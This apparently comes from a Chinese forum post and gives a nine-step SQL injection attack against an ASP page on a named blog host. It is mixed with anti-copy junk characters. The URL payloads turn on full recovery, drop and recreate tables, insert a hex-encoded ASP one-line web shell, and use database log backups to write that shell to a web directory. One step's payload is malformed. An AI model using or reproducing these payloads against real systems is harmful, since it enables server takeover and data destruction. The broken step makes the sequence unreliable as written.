第一步
# D# J' V9 w, H! Y0 E+ L4 Mhttp://itpro.blog.163.com/test.asp';alter/**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]--- \; L" i, x9 P+ g. D
! D$ D0 `" H6 k& l第二步:- l, P* e4 c! U; b& ]8 e& V" `
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--& u I3 N. ]! W5 a/ a$ x& X% |
9 {* L9 g8 j" C: o1 Q+ H第三步- P+ a: O9 F0 E
http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--/ U. `+ j* A3 R
3 ?. t) |( n' f) v
第四步4 K# s) d H; a$ P/ t0 Z9 S6 ~: ]" o
http://itpro.blog.163.com/test.asp';create/**/table/**/[itpro]([a]/**/image)--
9 k" K" D2 t+ @, {3 M
. e) l; @6 v; N5 ~第五步
% q% ?3 @* @5 Lhttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
& ^- q5 l; @1 y$ B, u7 p! X" v' Z; O6 W$ J, f
第六步3 r) i9 K$ [: B, m
http://itpro.blog.163.com/test.asp';insert/**/into/**/[itpro]([a])/**/values(0x3C254578656375746528726571756573742822697470726F222929253E)--
0 k* X1 P9 a2 [& q! l. B1 v3 i8 _
第七步
# e8 `) m3 _" `( Z( P. i* A6 h# {http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%0x64003A005C007700770077005C0077007700770072006F006F0074005C0077006F0077005C006C006500660074002E00610073007000/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
% ^4 d4 v; _$ D: {3 T' B
8 h! L' Z9 o1 V3 o# r: T5 G第八步4 Z& r' Q9 N0 J5 W* j, P0 \; Y8 {* u
http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--
0 Q, r9 h! L8 y) }* e1 m# h% O
$ E$ D6 c& d) l7 J0 s$ B# J第九步 ^, ]% j* N1 M3 S+ j
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
9 X9 f! F, L, D |